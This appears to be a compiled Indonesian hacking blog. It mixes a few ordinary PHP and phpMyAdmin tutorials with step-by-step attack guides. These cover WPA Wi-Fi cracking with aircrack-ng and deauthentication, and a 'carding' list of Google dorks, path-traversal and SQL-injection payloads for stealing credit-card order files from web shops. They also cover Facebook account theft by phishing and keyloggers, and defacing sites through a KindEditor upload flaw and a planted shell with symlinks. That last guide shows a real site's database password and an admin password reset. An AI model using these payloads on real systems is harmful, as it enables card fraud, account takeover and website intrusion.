Cara mengetahui IP orang lain

Kali ini saya akan membahas secara lengkap Cara Mengetahui IP Address Komputer Orang Lain. Yap.. Melacak Ip Address Komputer Orang ini sangatlah dicari-cari oleh orang sedunia. Maka dari itu saya akan membahas secara detail. Langsung aja ke TKP.

Disini akan dibahas :
1. Melacak alamat IP suatu situs
2. Melacak Real Adress server suatu situs
3. Cara Mengetahui IP address lawan chatting kita


-== Pembahasan ===-

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUSYANGDILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka http://www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di http://www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

Cara Mendapatkan Password Wifi Menggunakan BackTrack 5

 Kali ini saya akan berbagi sedikit tentang bagaimana Cara Mendapatkan Password Wifi Menggunakan BackTrack 5

Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.


Persiapan :
1. Aircrack
2. Dictionary attack

Langkah - Langkah :
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover


1. Hentikan semua proses yang menghambat jalannya aireplay
#airmon-ng check kill

2. Buat interface baru dengan mode monitor menggunakan airmon-ng
#airmon-ng start wlan0

3. Monitoring setiap akses poin yang ada di sekitar attacker
#airodump-ng mon0


4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump
#airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0


Keterangan :
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin

5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0

Keterangan :
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien

Note :
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0



6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng
#aircrack-ng output-01.cap -w /root/crack wpa.txt

Keterangan :
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.


7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini



 Oke, Sekian Sedikit Penjelasan dari saya, Semoga bermanfaat dan ingat, jangan salah gunakan untuk hal yang tidak penting, hehehe..

 udah saya test , lancar jaya BY:SODOP404(adam)

Cara benar instal BACKTRACK 5r3 64 bit

Untuk menginstall backtrack 5 r3 64 bit ataupun backtrack 5 r3 32 bit tidaklah sesulit yang dibayangkan. Hal pertama yang harus disiapkan adalah OS backtrack 5 r3itu sendiri, bagi yang belum memiliki silahkan download backtrack 5 r3 disini. Setelah semua siap kita akan mulai tahapan untuk menginstal bactrack,

1. masukkan DVD yang berisi OS Linux Backtrack ke komputer lalu Booting sehinngga tampil gambar seperti di bawah ini.

2. Setelah proses boot selesai maka akan tampil gambar seperti dibawah ini dan pilih "Backtrack Text - Default Boot Text Mode"

3. tunggu hingga proses hingga tampil seperti di bawah ini, setelah muncul gambar seperi di bawah ini kemuidan ketik "startx" untuk mendapatakan mode GUI.

4. kemudian klik pada ikon "Install Backtrack" pada desktop.

5. kemudian pilih bahasa yang diinginkan kemudian klik forward.

6. pilih kota dimana berada dengan mengklik pada peta kemudian klik forward.

7. klik forward, kecuali anda ingin menggati keyboard layout.

8. untuk mengatur hardisk pilih "Specify partitions manually (advance)" kemudian klik forward.

9. Setelah itu akan tampil halaman pengaturan pertisi hardisk dan jangan lupa buat SWAP sekitar 1 atu 2GB.

10. Setelah mengisi data pribadi dan password klik forward maka akan keluar tampilan seperti ini,kemudian klik Install.

11. setelah mengklik "Install" maka akan tampil proses instalasi dan tinggal tunggu proses instalasi seperti gambar di bawah ini,

Setelah proses instalasi selesai, silahkan restart komputer dan backtrack siap dipakai.

Cara Hack Kartu ATM Carding

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Carding bagi para Pemula

sebelumnya, maaf jika ada pertanyaan lebih lanjut dimohon cari sendiri solusinya, ini hanya sekedar informasi.

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target :www.(sasaran).com/shopadmin.asp

Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target:www.(sasaran).com/cgi-bin/store/index.cgi?page=short_blue.htm

Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya: www.(sasaran).com/cgi-bin/store/index.cgi?page=../admin/files/order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com allinurl:/metacart/
Contoh target : www.(sasaran).com/metacart/about.asp

Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya :www.(sasaran).com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.(sasaran).com/xxxx/DCShop/xxxx

Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.(sasaran).com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.(sasaran).com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp

Hasilnya : www.(sasaran).com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb

Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.(sasaran).com/data/pdshoppro.mdb

Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google : Ketik –> allinurl:/commercesql/
Contoh : www.(sasaran).com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –> cgi-bin/commercesql/index.cgi?page=

Hasilnya : www.(sasaran).com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –> www.(sasaran).com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

Untuk melihat admin manager –> www.(sasaran).com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

Untuk melihat file log/CCnya –> www.(sasaran).com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…

7. contoh bugs pada bentuk toko sistem : EShop contoh toko akan muncul di search
engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.(sasaran).com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.(sasaran).com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.(sasaran).net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di
site tsb. terdapat file berisi data cc Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.(sasaran).net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi,
dengan format
http://www.(sasaran).com/cart32/
Contoh http://www.(sasaran).net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh : http://(sasaran).com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,

fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin

Untuk login admin ke http://(sasaran).com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6 Untuk login admin, ada di http://(sasaran)/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.(sasaran).com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.(sasaran).com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.(sasaran).com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.(sasaran).com/cgi-local/shopper.cgi?preadd=action&key=…&template…

13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.(sasaran).org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb

Hasilnya : www.(sasaran).org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google Ketik –> inurl:"/cart.php?m="
Contoh : http://(sasaran).com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://(sasaran).com/store/admin
Trus masukin username sama pass nya pake statment SQL injection Usename : ‘or"="
Password : ‘or"="

Cara di atas adalah sekedar ilmu pengetahuan saya sarankan agar anda tidak jatuh ke jurang kemaksiatan dunia maya

Cara Membobol Situs yang terblokir dari SERVER

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Macam-Macam cara Bobol akun FB

1. Dengan cara Phising / FakeLogin.
cara ini di buat di era jejaring Friendster dan MySpace masih berjaya. Cara ini cukup efektif dilancarkan oleh pencuri password, biasanya si calon korban adalah para netters yang nyubi, atau kita pun bisa masuk perangkap mereka jika kita lengah. indikasinya: biasanya mereka mengirimkan pesan melalui email yang isinya ajakan atau tawaran untuk menambahkan daftar teman mereka, lalu mereka memberikan link dan membawa kita untuk login ke akun kita… disinilah mereka bekerja, tampilan halaman depan dibuat sedemikian rupa sehingga mirip dengan situs aslinya,
sebagai contoh buka link ini.. jangan lupa sebelum masuk biasanya ada WARNING “situs ini telah dilaporkan sebagai pemalsuan web” klik abaikan saja jika ingin melihat
jika anda login di halaman tersebut, maka semua data anda akan masuk ke database si pencuri password.
kalo sudah gini kan bisa repot kita..nah sekarang gimana cana antisipasinya??
Caranya sih cukup simpel,
- Pastikan anda Login di www.facebook.com [kalo alamat FB ada tambahan sesuatu, itu berarti situs palsu misal http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html]
-Jangan bagikan alamat email anda pada sembarang orang yang tidak anda kenal.[biasanya sih orang2 yang gabung di grup cara cepat dapat teman sering menyertakan alamat email]
-Jangan pernah berfikir untuk membobol FB orang dengan cara download software facebook hacker, karena jika anda ingin menggunakannya anda harus login dan menuliskan alamat email dan password, terbukti malah paswword anda yang akan di hacked.

2. Dengan cara KeyLoger
Bagi anda pengguna jasa Warnet untuk melakukan aktifitas browsing ato mungkin buka facebook, anda harus berhati hati dengan para hacker yang menggunakan Keyloger untuk mencuri pasword anda. cara ini sudah di buat sebelum jejaring Friendster dan MySpace masih berdiri. dulunya sih dibuat untuk memperbaiki jika ada kerusakan pada sistem.
Cara ini cukup efektif dilancarkan oleh pencuri password, biasanya si hacker menginstall di komputer warnet, calon korban adalah semua pengguna PC yang sudah terinstal keyloger tidak terkecuali kita pun bisa masuk perangkap mereka jika kita lengah.
ini adalah contoh software KeyLoger

cara mengatasinya sih pernah di bahas di tips facebook aman. tapi akan saya bahas lagi deh,,

KeyLoger adalah pencatatan setiap kali tombol pada keyboard di tekan.
contoh: sAya beLajar hAck Facebook 360 hAri 12 deTik *
tulisan di atas akan tercatat di keyloger seperti dibawah ini:
s [shift] a y a [space] b e [shift] l a j a r [space] h [shift] a c k [space] [shift] f a c e b o o k [space] 3 6 0 [space] h [shift] a r i [space] 1 2 [space] d e [shift] t i k [space] [shift] 8
memang agak ribet sih bacanya, namun para hacker sudah punya cara cepat untuk mengkonfersi bahasa key loger..
Dengan demikian, walau kita menggunakan password kombinasi angka huruf dan karakter, tetap saja dengan keyloger akan tercatat semua aktifitas pada keyboard.
anda bisa mendownloadnyadisini
Antisipasi dengan cara:
-jika anda memiliki flashdisk anda bisa tulis alamat email pada notepad, copy-paste jika ingin login [anda tidak akan melakukan aktifitas pengetikan pada user name ato email dan sebagainya]
jika perlu dengan paswordnya juga.
-jika pasword adalah angka silahkan anda buka aplikasi kalkulator pada windows, bisa di jadikan sebagai virtual key. gunakan dengan cara klik pada angka, kemudian copast pada bagian password.
-ataw anda gunakan virtual key yang disediakan pada operating system komputer dengan cara:
Klick start >> kemudian All Program >> kemudian accessories >> kemudian accesbility >> kemudian On-screen keyboard
nanti akan muncul seperti ini:

kemudian anda buka notepad
Klick start >> kemudian All Program >> kemudian accessories >> kemudian pilih Notepad
setelah anda membuka notepad silahkan klik pada virtual kerboard sesuai dengan alamat email anda, setiap klik akan muncul pada notepad, jika sudah selesai tekan [ctrl]+[a] lalu [ctrl]+[c] kemudian anda pastekan pada halaman facebook dengan menekan [ctrl]+[v] ingat pada www.facebook.com
lakukan hal yang sama pada password anda
dengan demikian anda tidak melakukan aktifitas pada keyboard.

3. Hack Facebook dengan Facebook Freezer
cara ini hanya dilakukan oleh orang yang iseng saja, FacebookFreezer bekerja agar akun yang di Freez tidak bisa masuk ke akunnya..
softwarenya seperti ini:
indikasi anda adalah korban FacebookFreezer adalah anda tidak bisa masuk walaupun anda sudah benar memasukan email dan password
caranya mengatasinya cukup mudah,
a. Ketika Anda memasukkan alamat email dan password akun Facebook Anda yang sedang di-freeze seseorang, maka kemudian akan muncul pesan sbb (klik untuk memperbesar):
b. Selanjutnya segeralah Anda klik tulisan yang berwarna merah, dan muncul pesan sbb (klik untuk memperbesar):
Pesan di atas memberitahukan Anda bahwa untuk mengganti password Anda, Anda diminta untuk melakukan klik “Atur Ulang Kata Sandi”, agar sebuah alamat email konfirmasi dari pihak facebook terkirim ke email Anda.
c. Buka email Anda kemudian baca petunjuknya kemudian klik link yang diberikan, seperti berikut (klik untuk memperbesar):
d. Setelah Anda menuju link yang diberikan, masukkan kata sandi Anda yang baru. Jreeennggg!!! akhirnya Anda dapat masuk kembali di halaman akun facebook Anda bersama teman-teman jaringan Anda.

4. Dengan software Facebook Account hacker
Cara ini sangat kejam..

Cara Mengimport Database MySQL dari PHPMyAdmin

Cara mengimport database MySQL dari PHPMyAdmin ~ beberapa waktu lalu saya sudah share untuk membuat database dari command naah sekarang saya akan coba share cara mengimport database SQL yang pernah kita buat sebelumnya dari komputer lain. dengan mengimport database .sql sobat ndak perlu susah-susah lagi mbikin dari awal.

Sebelum sobat menginport database dari PhpMyAdmin hal yang perlu diperhatikan adalah ; pastiin komputernya udah teristall web server lokal (apache, xampp, wampp atau sejenisnya), browser dan file dabasenya (.sql)  yang pasti whehehe.. kalau udah ada semua tinggal ikutin langkah step by stepnya seperti berikut :

1. Silahkan jalankan /run web server lokal sobat, di sini saya contohkan saya memakai xampp seperti ini

2. Pada browser (mozil, opera, chrome) dalam adress bar sobat ketikka “http://localhost/phpmyadmin/” tanpa tanda petik ” ” kemudian enter.

3. Setelah berhasil masuk ke phpmyaadmin selanjutnya pilih menu Import, pada opsi File to import silahkan klik tombol Browse dan cari dan pilih file database (.sql) yang mau sobat import tadi jika sudah pada pojok kanan bawah klik Go

4. Jika muncul pesan import has been succesfully finished, artinya database sobat udah berhasil di import.

NB : untuk mengexport /mengambil database yang sudah pernah kita bikin prinsipnya sama saja, yakni langkahnya sama seperti pada nomor 1,2, trus yang ke tiga pilih menu Export (silahkan pilih database yang sobat inginkan /yang ingin di export).

“selamat mencoba ya… ! :D”

Mengambil Data Base dengan Koneksi PHP

Dalam suatu website kita membutuhkan sebuah data dari database . nah kali ini saya akan memberikan cara bagaimana mengambil data dari database . Berikut langkah-langkah Mengambil data dari database dengan koneksi PHP

1. Membuat koneksi ke database .
   

   <?php
   $connect = mysql_connect(‘localhost’,'root’,”);
   $db = mysql_select_db(‘warnet’,$connect);
   ?>

2. Koneksi diatas bisa disatukan didalam file atau bisa dipanggil nanti melalui include , require dan yang lain-lain.
3. Pilih table database nya  . Isi dari tabel komputer No_Id , Tipe dan Qty
   

   <?php
   /// Membuat Recordset
   $sql =”select * FROM komputer”; //table komputer
   $sqr =mysql_query($sql);
   while($data =mysql_fetch_array($sqr)) {
   ?>

4. Dari script diatas komputer adalah nama table yang berada di database warnet
5. $data adalah variabel untuk data dari database
6. Script untuk memunculkan
   

   <table width=”500″ height=”59″ border=”1″ cellpadding=”2″ align=”center”>
   <tr>
   <td width=”10%” height=”23″ align=”center” bgcolor=”#FF0000″><strong>No_Id</strong></td>
   <td width=”20%” align=”center” bgcolor=”#FF0000″><strong>Tipe</strong></td>
   <td width=”20%” align=”center” bgcolor=”#FF0000″><strong>Qty</strong></td>
   <td width=”20%” align=”center” bgcolor=”#FF0000″><strong>Action </strong></td>
   </tr>
   <?php
   /// Membuat Recordset
   $sql =”select * FROM komputer”;
   $sqr =mysql_query($sql);
   while($data =mysql_fetch_array($sqr)) {
   ?>
   <tr>
   <td><? echo $data[0]; ?></td>
   <td><? echo $data[1]; ?></td>
   <td><? echo $data[2]; ?></td>
   <td><a id=”demo” title=”edit” href=”editkomputer.php?id=<?php echo $data[0];?>”> Edit </a> -
   <a id=”demo” title=”Delete” href=”deletekomp.php?id=<?php echo $data[0]; ?>” onClick=”return confirm(‘Yakin nih mau di delete?’)”>Delete</a></td>
   
   </tr>
   <?php } ?>
   </th> </table>

7. Dan ini hasilnya nanti
   

   No_Id	Tipe	Qty	Action
   kom_1	Alienware	1	Edit - Delete
   kom_2	Asus	13	Edit - Delete
   kom_3	Acer	20	Edit - Delete

DEFACE paling gampang bagi NEWBIE

Hai sobat semua gimana kabar nya nih, baru update lagi nih blog. Siang hari ini saya akan share tutorial Cara Deface Website Dengan Teknik Web KindEditor. Bagi yang suka maen empes-empesan, Ane punya tutorial deface yang ngga terlalu sulit nih, anak SD juga kayanya bisa wkwk :p , denger musik widget di atas biar lebih santai !! :D

Ok, Langsung aja kita mulai defacenya ^^

Masukan Dorknya ke kotak pencarian Google :

• inurl:examples/uploadbutton.html
• inurl:kindeditor

Exploit :

• http://www.contohtarget.com/path/kindeditor/examples/uploadbutton.html

1. Kalo web target udah dapet, kita klik upload,

2. Kemudian pilih HTML defecan agan. Contoh disini kita menggunakan HTML ane... Cireboncyber4rt.html

3. Nanti akan keluar URL hasil upload-an HTML kita... copas link tersebut dan letakkan diakhir URL.

4. Kemudian kalo sudah, tekan Enter.
5. Taraaa... :D

Hasilnya :

• http://www.daitianyi.net.
• http://modelku.com/

Gimana, mudahkan? hehehe... Bagi agan-agan yang masih bingung, silahkan bisa pakai demo upload buttonnya yang sudah saya dapatkan dibawah ini :

• Upload Button Example

Semoga tutorial diatas tentang Cara Deface Website Dengan Teknik Web KindEditor bisa bermanfaat bagi agan-agan sekalian, kurang lebihnya saya mohon maaf, Wassalam.

DEFACE dengan SYMLINK

Halo sob (^_^), kali ini saya akan berbagi cara menggunakan Symlink.

Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^). biar lebih santai denger musik di atas :D

Pertama masuk ke Shell yang sudah di tanam di web target.

lalu upload Sym.php ( Digunakan untuk SYMLINK ).

Klo belum punya silahkan Download Disini Sob (^_^)

Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.

Selanjutnya akses / buka symlink yang telah agan upload.

Lalu klik user & domain & symlink.

Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".

Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.

Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.

Perhatikan baris ini :

define('DB_HOST', 'localhost');

DB NAME = thefussy_wrdp3

DB USER = thefussy_wrdp3

DB PASSWORD = CZyLRz1EuwSd

DB HOST = localhost

Diatas adalah informasi mengenai Akses Database MySQL.

Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.

Klik koneksi MySQL.

Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.

Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.

Lalu, saya klik "wp_user".

Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).

Agan buat password dalam bentuk MD5 Disini Sob (^_^).

Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a

Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.

Berarti saya akan login dengan username admin dan password 121212.

Sekarang kita coba sob (^_^). 

Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin

Saya login & wauuuuu, kereennn sob (^_^).

Saya berhasil masuk (^_^).

Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak (^_^)

Selamat Mencoba (^_^).